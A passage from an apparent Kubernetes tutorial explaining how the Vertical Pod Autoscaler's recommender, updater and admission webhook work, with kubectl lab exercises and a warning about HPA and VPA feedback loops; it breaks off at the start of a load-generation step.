&lt;p&gt;&lt;strong&gt;Step 2: Deploy a workload to monitor&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: hamster
spec:
  replicas: 2
  selector:
    matchLabels:
      app: hamster
  template:
    metadata:
      labels:
        app: hamster
    spec:
      containers:
      - name: hamster
        image: registry.k8s.io/ubuntu-slim:0.14
        resources:
          requests:
            cpu: 100m
            memory: 50Mi
        command: ["/bin/sh"]
        args:
        - "-c"
        - "while true; do timeout 0.5s yes &amp;gt;/dev/null; sleep 0.5s; done"
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 3: Create a VPA in &lt;code&gt;Off&lt;/code&gt; mode (recommendation only)&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: hamster-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: hamster
  updatePolicy:
    updateMode: "Off"
  resourcePolicy:
    containerPolicies:
    - containerName: hamster
      minAllowed:
        cpu: 50m
        memory: 50Mi
      maxAllowed:
        cpu: 2
        memory: 1Gi
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 4: Wait ~5 minutes for recommendations to populate, then inspect&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Poll until recommendations appear&lt;/span&gt;
kubectl get vpa hamster-vpa &lt;span class="nt"&gt;--watch&lt;/span&gt;

&lt;span class="c"&gt;# When RECOMMENDED shows values, describe for full detail&lt;/span&gt;
kubectl describe vpa hamster-vpa
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; The &lt;code&gt;status.recommendation.containerRecommendations&lt;/code&gt; section shows &lt;code&gt;lowerBound&lt;/code&gt;, &lt;code&gt;target&lt;/code&gt;, and &lt;code&gt;upperBound&lt;/code&gt; for both CPU and memory. Compare these against your manifest's requests. The gap is your rightsizing debt.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key things to note:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The memory recommendation is likely much higher than &lt;code&gt;50Mi&lt;/code&gt; (processes have real overhead)&lt;/li&gt;
&lt;li&gt;The CPU recommendation may differ significantly from &lt;code&gt;100m&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;These are updated continuously as the workload runs&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Recommender: Statistical Core
&lt;/h3&gt;

&lt;p&gt;The Recommender maintains an in-memory histogram of CPU and memory usage per container, modeled as a &lt;strong&gt;decay-weighted percentile estimator&lt;/strong&gt;. Older samples are down-weighted exponentially, giving more influence to recent behavior while retaining long-tail signal.&lt;/p&gt;

&lt;p&gt;The histogram uses &lt;strong&gt;exponential bucket boundaries&lt;/strong&gt; — each bucket is ~10% wider than the previous, enabling compact representation across orders of magnitude of resource values.&lt;/p&gt;
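A toy version of that data structure makes the mechanics concrete. This is an illustrative sketch, not VPA's implementation: the 1.1 bucket ratio follows the "~10% wider" growth described above, while the first-bucket size and 24-hour half-life are assumed constants.

```python
import math

class DecayingExpHistogram:
    """Toy decay-weighted histogram over exponentially wider buckets.
    The 1.1 ratio mirrors '~10% wider' bucket growth; the first-bucket
    size and 24h half-life are illustrative constants, not VPA's."""

    def __init__(self, first_bucket=0.01, ratio=1.1, half_life_hours=24.0):
        self.first, self.ratio = first_bucket, ratio
        self.half_life = half_life_hours
        self.weights = {}  # bucket index -> accumulated decayed weight

    def bucket(self, value):
        if value <= self.first:
            return 0
        return int(math.log(value / self.first, self.ratio)) + 1

    def add(self, value, time_hours):
        # A sample taken one half-life later carries twice the weight.
        w = 2.0 ** (time_hours / self.half_life)
        idx = self.bucket(value)
        self.weights[idx] = self.weights.get(idx, 0.0) + w

    def percentile(self, p):
        total = sum(self.weights.values())
        acc = 0.0
        for idx in sorted(self.weights):
            acc += self.weights[idx]
            if acc >= p * total:
                # Return the bucket's upper edge: a conservative estimate.
                return self.first * self.ratio ** idx
        return 0.0

h = DecayingExpHistogram()
# 20 hours at 200m CPU, then a recent 4-hour burst at 500m:
for hour, cores in enumerate([0.2] * 20 + [0.5] * 4):
    h.add(cores, hour)
print(round(h.percentile(0.9), 3))  # ~0.55: the recent burst dominates p90
```

Note how four recent samples outweigh twenty older ones at p90: that is the decay weighting doing exactly what the prose describes.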

&lt;p&gt;Two important asymmetries in how CPU and memory are modeled:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Memory uses peak samples&lt;/strong&gt;, not averages. Since memory is not compressible (a process that allocates 2GB cannot be throttled down to 1GB without an OOMKill), the Recommender intentionally biases toward observed peaks rather than typical usage. This makes memory recommendations more conservative than CPU by design.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;CPU recommendations smooth over bursts&lt;/strong&gt;. CPU is compressible — throttling slows a process but doesn't kill it. The recommender uses a smoother model for CPU, accepting that brief spikes will be throttled rather than sizing for them. However, this creates a blind spot: &lt;strong&gt;if CPU limits are enforced aggressively, throttling suppresses the observed usage signal&lt;/strong&gt;, making VPA's histogram reflect artificially low CPU consumption. The Recommender cannot distinguish "this container uses 200m" from "this container is throttled at 200m." If you see VPA recommending low CPU while your application has high p99 latency, check &lt;code&gt;container_cpu_throttled_seconds_total&lt;/code&gt; before trusting the recommendation.&lt;/p&gt;

&lt;p&gt;Key estimation parameters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Target percentile&lt;/strong&gt;: CPU recommended at p90 of observed usage; memory at p95. Both are configurable.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Safety margin&lt;/strong&gt;: &lt;code&gt;+15%&lt;/code&gt; added on top of the percentile estimate (configurable via &lt;code&gt;--recommendation-margin-fraction&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Confidence&lt;/strong&gt;: For containers with sparse samples, confidence intervals widen and recommendations inflate conservatively.&lt;/li&gt;
&lt;/ul&gt;
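Stitched together, the estimation pipeline is roughly "percentile, plus margin, inflated when history is sparse". The confidence term below is a simplified stand-in for VPA's multiplier, not its exact formula:

```python
def recommend(percentile_estimate, margin_fraction=0.15, history_days=8.0):
    """Illustrative recommendation math: percentile estimate, plus the
    safety margin, inflated when usage history is sparse. The confidence
    term is a simplified stand-in, not VPA's actual multiplier."""
    confidence = 1.0 + 1.0 / max(history_days, 1e-9)
    return percentile_estimate * (1.0 + margin_fraction) * confidence

# p90 CPU observed at 400m:
print(recommend(0.400, history_days=8))  # mature workload: modest inflation
print(recommend(0.400, history_days=1))  # day-old workload: doubled estimate
```

The practical takeaway survives the simplification: young workloads get deliberately padded recommendations, which tighten as samples accumulate.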

&lt;p&gt;Critically, the Recommender produces three values written to &lt;code&gt;VPA.status.recommendation&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcmzfz8cmzcagqxdw8m97.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcmzfz8cmzcagqxdw8m97.png" alt="image" width="800" height="905"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The &lt;strong&gt;Updater&lt;/strong&gt; only evicts a pod if its current requests fall &lt;strong&gt;outside&lt;/strong&gt; the &lt;code&gt;[lowerBound, upperBound]&lt;/code&gt; range — not every time the &lt;code&gt;target&lt;/code&gt; shifts. This prevents constant churn under normal variance.&lt;/p&gt;
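That band check is worth internalizing, since it explains why a recommendation can drift for days without any eviction. A minimal sketch of the decision (the real Updater also ranks candidates and consults PDBs first):

```python
def should_evict(current_request, lower_bound, upper_bound):
    """Evict only when the live request falls outside [lowerBound,
    upperBound]; a drifting target alone never triggers churn."""
    return current_request < lower_bound or current_request > upper_bound

# Recommendation: lowerBound=250m, target=400m, upperBound=900m
print(should_evict(100, 250, 900))   # True: under-provisioned
print(should_evict(300, 250, 900))   # False: in-band, though target is 400m
print(should_evict(1200, 250, 900))  # True: over-provisioned
```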

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Updater: The Disruptive Actor
&lt;/h3&gt;

&lt;p&gt;The Updater runs on a one-minute loop. If a pod's current requests fall outside the recommended bounds, the Updater evicts it. The pod is recreated by its owning controller, and the Admission Webhook intercepts that new pod creation to inject the updated requests.&lt;/p&gt;

&lt;p&gt;Two important constraints on Updater behavior:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;PodDisruptionBudgets are respected.&lt;/strong&gt; If a PDB is too strict, or the workload is running at minimum replicas, VPA will refuse to evict and silently do nothing. Teams often discover this when VPA appears "stuck" — recommendations update in &lt;code&gt;.status&lt;/code&gt; but pods never change. Check PDB &lt;code&gt;disruptions allowed&lt;/code&gt; if VPA seems inert.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;It requires pod restarts.&lt;/strong&gt; In-Place Pod Vertical Scaling (&lt;a href="https://github.com/kubernetes/enhancements/issues/1287" rel="noopener noreferrer"&gt;KEP-1287&lt;/a&gt;) is beta in recent Kubernetes releases but requires feature gates and has provider-specific support constraints. Do not assume it is available without verifying your cluster version and managed Kubernetes provider.&lt;/p&gt;

&lt;p&gt;For stateful workloads, control eviction behavior explicitly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;updatePolicy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;updateMode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Off"&lt;/span&gt;        &lt;span class="c1"&gt;# Recommendations only — never evict&lt;/span&gt;
  &lt;span class="c1"&gt;# updateMode: "Initial"  # Inject on creation, never evict running pods&lt;/span&gt;
  &lt;span class="c1"&gt;# updateMode: "Auto"     # Full lifecycle management (default)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Starting with &lt;code&gt;Off&lt;/code&gt; and using VPA as a &lt;strong&gt;recommendation engine&lt;/strong&gt; is the safest posture for stateful workloads. Apply recommendations via a GitOps pipeline or scheduled maintenance window.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 6: Observe VPA Auto Mode and the PDB Blocker
&lt;/h3&gt;

&lt;p&gt;This exercise demonstrates VPA's Auto mode evicting pods, then shows how a PDB silently blocks it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Part A: Enable Auto mode and watch the eviction&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Switch hamster VPA to Auto mode&lt;/span&gt;
kubectl patch vpa hamster-vpa &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'
spec:
  updatePolicy:
    updateMode: "Auto"'&lt;/span&gt;

&lt;span class="c"&gt;# Watch for evictions — VPA will evict pods whose requests differ from recommendation&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;hamster &lt;span class="nt"&gt;--watch&lt;/span&gt; &amp;amp;
kubectl get events &lt;span class="nt"&gt;--field-selector&lt;/span&gt; &lt;span class="nv"&gt;reason&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;EvictedByVPA &lt;span class="nt"&gt;--watch&lt;/span&gt; &amp;amp;

&lt;span class="c"&gt;# After eviction, check the new pod's actual resource requests&lt;/span&gt;
&lt;span class="c"&gt;# (these are injected by the VPA Admission Controller)&lt;/span&gt;
kubectl get pod &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;hamster &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{range .items[*]}{.metadata.name}{"\t"}{.spec.containers[0].resources}{"\n"}{end}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; The new pods will have different &lt;code&gt;requests&lt;/code&gt; than what's in the Deployment spec. The VPA Admission Controller mutated them at pod creation time. Run &lt;code&gt;kubectl get deployment hamster -o yaml | grep -A5 resources&lt;/code&gt; — the Deployment spec is &lt;em&gt;unchanged&lt;/em&gt;. This is the "advisory manifest" behavior described in the Admission Controller section.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Part B: Create a PDB that blocks eviction&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# First, scale down to 1 replica to make the PDB bite&lt;/span&gt;
kubectl scale deployment hamster &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1

&lt;span class="c"&gt;# Create a PDB requiring minAvailable=1&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: policy/v1
kind: PodDisruptionBudget
metadata:
  name: hamster-pdb
spec:
  minAvailable: 1
  selector:
    matchLabels:
      app: hamster
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;&lt;span class="c"&gt;# Force VPA to want to evict by temporarily setting a request far outside bounds&lt;/span&gt;
kubectl patch deployment hamster &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'json'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'[{"op":"replace","path":"/spec/template/spec/containers/0/resources/requests/cpu","value":"999m"}]'&lt;/span&gt;

&lt;span class="c"&gt;# Wait a couple minutes, then check — VPA recommendations will show divergence&lt;/span&gt;
&lt;span class="c"&gt;# but no eviction will occur&lt;/span&gt;
kubectl describe vpa hamster-vpa | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A20&lt;/span&gt; &lt;span class="s2"&gt;"Conditions:"&lt;/span&gt;
kubectl describe pdb hamster-pdb
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; The VPA status will show the recommendation is out of bounds, but the pod is not evicted. The PDB shows &lt;code&gt;Disruptions Allowed: 0&lt;/code&gt;. This is the "VPA appears stuck" scenario described in the Updater section.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cleanup:&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl delete pdb hamster-pdb
kubectl scale deployment hamster &lt;span class="nt"&gt;--replicas&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;2
kubectl patch vpa hamster-vpa &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{"spec":{"updatePolicy":{"updateMode":"Off"}}}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Admission Controller: The Mutation Point
&lt;/h3&gt;

&lt;p&gt;When a pod creation request reaches the API server, the VPA Admission Controller (&lt;code&gt;MutatingWebhookConfiguration&lt;/code&gt;) intercepts it, looks up the VPA object for the pod's owner, and &lt;strong&gt;overwrites &lt;code&gt;resources.requests&lt;/code&gt;&lt;/strong&gt; in the pod spec before it is persisted.&lt;/p&gt;

&lt;p&gt;Your Deployment YAML's resource requests become advisory at runtime — VPA owns the actual values. This is intentional but can surprise teams who expect &lt;code&gt;kubectl get pod -o yaml&lt;/code&gt; to match their manifests.&lt;/p&gt;




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 7: Confirm the Admission Webhook Mutation
&lt;/h3&gt;

&lt;p&gt;This is a quick but important exercise to internalize that VPA mutates pods at creation time, making manifests advisory.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Inspect the MutatingWebhookConfiguration&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl get mutatingwebhookconfigurations | &lt;span class="nb"&gt;grep &lt;/span&gt;vpa
kubectl describe mutatingwebhookconfiguration vpa-webhook-config | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-A10&lt;/span&gt; &lt;span class="s2"&gt;"Rules:"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Check the current VPA mode&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Before restarting pods, confirm which update mode VPA is in:&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl get vpa hamster-vpa &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{.spec.updatePolicy.updateMode}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;


&lt;blockquote&gt;
&lt;p&gt;⚠️ &lt;strong&gt;If the mode is &lt;code&gt;Off&lt;/code&gt;&lt;/strong&gt;, the Admission Webhook will not mutate pod requests — the pod spec will match the Deployment manifest exactly. This is expected. You must switch to &lt;code&gt;Initial&lt;/code&gt; (Step 3) to observe the mutation.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 3: Switch to &lt;code&gt;Initial&lt;/code&gt; mode to enable webhook mutation&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;Initial&lt;/code&gt; mode instructs VPA to inject recommendations at pod creation time, but never evict running pods. This is the safest mode to observe mutation without disruption:&lt;/p&gt;



&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl patch vpa hamster-vpa &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{"spec":{"updatePolicy":{"updateMode":"Initial"}}}'&lt;/span&gt;

&lt;span class="c"&gt;# Confirm the mode change took effect&lt;/span&gt;
kubectl get vpa hamster-vpa &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{.spec.updatePolicy.updateMode}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;



&lt;p&gt;&lt;strong&gt;Step 4: Restart pods and compare requests&lt;/strong&gt;&lt;/p&gt;



&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Trigger a rollout so new pods are created (and mutated by the webhook)&lt;/span&gt;
kubectl rollout restart deployment hamster
kubectl rollout status deployment hamster

&lt;span class="c"&gt;# Compare Deployment spec requests vs. actual pod requests&lt;/span&gt;
&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"=== Deployment spec requests ==="&lt;/span&gt;
kubectl get deployment hamster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{.spec.template.spec.containers[0].resources}'&lt;/span&gt; | python3 &lt;span class="nt"&gt;-m&lt;/span&gt; json.tool

&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s2"&gt;"=== Actual pod requests (post-mutation) ==="&lt;/span&gt;
kubectl get pods &lt;span class="nt"&gt;-l&lt;/span&gt; &lt;span class="nv"&gt;app&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;hamster &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="nv"&gt;jsonpath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{range .items[*]}{.metadata.name}{"\n"}{.spec.containers[0].resources}{"\n\n"}{end}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;



&lt;p&gt;&lt;strong&gt;What to observe:&lt;/strong&gt; The pod's actual CPU and memory requests should now differ from the Deployment manifest — they reflect VPA's recommendation values injected by the Admission Webhook at pod creation time. The Deployment spec itself is unchanged; VPA only mutates the live pod spec.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;💡 &lt;strong&gt;If requests still match after switching to &lt;code&gt;Initial&lt;/code&gt; mode&lt;/strong&gt;, VPA may not have built up enough sample history yet to generate a recommendation. Wait 2–3 minutes and check: &lt;code&gt;kubectl describe vpa hamster-vpa | grep -A10 "Recommendation:"&lt;/code&gt;. If the &lt;code&gt;Recommendation&lt;/code&gt; section is empty, give the workload more time to run before restarting.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 5: Reset VPA mode&lt;/strong&gt;&lt;/p&gt;



&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Return to Off mode so later exercises start from a known state&lt;/span&gt;
kubectl patch vpa hamster-vpa &lt;span class="nt"&gt;--type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'merge'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'{"spec":{"updatePolicy":{"updateMode":"Off"}}}'&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;




&lt;/blockquote&gt;





&lt;h2&gt;
  
  
  HPA vs VPA: When to Use Which
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhvhtt1o1335e5mhhn745.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhvhtt1o1335e5mhhn745.png" alt="image" width="800" height="800"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;The safe combination rule&lt;/strong&gt;: Never run HPA and VPA on the same metric. If HPA is managing CPU utilization while VPA is adjusting CPU requests, they form a &lt;strong&gt;destabilizing positive feedback loop&lt;/strong&gt;:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;VPA increases CPU requests&lt;/li&gt;
&lt;li&gt;Same real CPU usage is now a smaller fraction of the larger request — HPA utilization drops&lt;/li&gt;
&lt;li&gt;HPA scales in (fewer replicas)&lt;/li&gt;
&lt;li&gt;Load concentrates on remaining pods — per-pod CPU rises&lt;/li&gt;
&lt;li&gt;VPA observes higher per-pod usage, increases requests further&lt;/li&gt;
&lt;li&gt;Repeat&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This loop does not converge. It oscillates, with each VPA eviction cycle acting as a perturbation that resets the HPA signal. The safe pattern is &lt;strong&gt;HPA on external/custom metrics&lt;/strong&gt; (RPS, queue depth, active connections) with &lt;strong&gt;VPA managing CPU/memory requests&lt;/strong&gt;. Because the two controllers then act on orthogonal signals, neither one's output feeds back into the other's input.&lt;/p&gt;
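&lt;p&gt;To make the divergence concrete, here is a toy simulation of the two loops. It is deliberately simplified and is not VPA or HPA source code: the HPA line implements the real &lt;code&gt;desiredReplicas = ceil(currentReplicas * utilization / target)&lt;/code&gt; formula, while the VPA update rule (observed usage plus a 50% margin) is an assumed stand-in for the recommender.&lt;/p&gt;

```python
import math

# Toy model of the HPA + VPA feedback loop. NOT controller source code:
# the VPA update rule (usage * 1.5) is an assumed simplification.
total_load = 1000   # millicores of real work, held constant
replicas = 4
request = 200       # per-pod CPU request (millicores)
target = 0.5        # HPA target utilization (50%)

history = []
for step in range(6):
    per_pod_usage = total_load / replicas
    utilization = per_pod_usage / request
    # HPA: desiredReplicas = ceil(currentReplicas * utilization / target)
    replicas = max(1, math.ceil(replicas * utilization / target))
    # VPA (simplified): recommend observed usage plus a safety margin
    request = math.ceil(per_pod_usage * 1.5)
    history.append(replicas)

print(history)  # replica count never settles under constant load
```

&lt;p&gt;Even with load held perfectly constant, the replica count bounces (10, then 6, then 14, and so on) because every VPA request change rescales the utilization signal HPA steers on.&lt;/p&gt;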




&lt;blockquote&gt;
&lt;h3&gt;
  
  
  🧪 Exercise 8: Reproduce the HPA + VPA Feedback Loop
&lt;/h3&gt;

&lt;p&gt;This is the most important exercise in the guide. You will deliberately create the feedback loop described above and observe it destabilize replica count.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: Deploy a workload with both CPU-based HPA and VPA in Auto mode&lt;/strong&gt;&lt;/p&gt;


&lt;pre class="highlight shell"&gt;&lt;code&gt;kubectl create deployment feedback-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--image&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;registry.k8s.io/hpa-example &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80
kubectl &lt;span class="nb"&gt;set &lt;/span&gt;resources deployment feedback-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--requests&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;200m &lt;span class="nt"&gt;--limits&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;cpu&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;500m
kubectl expose deployment feedback-test &lt;span class="nt"&gt;--port&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;80

&lt;span class="c"&gt;# CPU-based HPA&lt;/span&gt;
kubectl autoscale deployment feedback-test &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--cpu-percent&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;50 &lt;span class="nt"&gt;--min&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;1 &lt;span class="nt"&gt;--max&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;8

&lt;span class="c"&gt;# VPA in Auto mode on the same workload&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt; | kubectl apply -f -
apiVersion: autoscaling.k8s.io/v1
kind: VerticalPodAutoscaler
metadata:
  name: feedback-test-vpa
spec:
  targetRef:
    apiVersion: apps/v1
    kind: Deployment
    name: feedback-test
  updatePolicy:
    updateMode: "Auto"
  resourcePolicy:
    containerPolicies:
    - containerName: hpa-example   # kubectl create deployment names the container after the image
      minAllowed:
        cpu: 50m
      maxAllowed:
        cpu: 2
&lt;/span&gt;&lt;span class="no"&gt;EOF
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;


&lt;p&gt;&lt;strong&gt;Step 2: Apply moderate, sustained load&lt;/strong&gt;&lt;/p&gt;


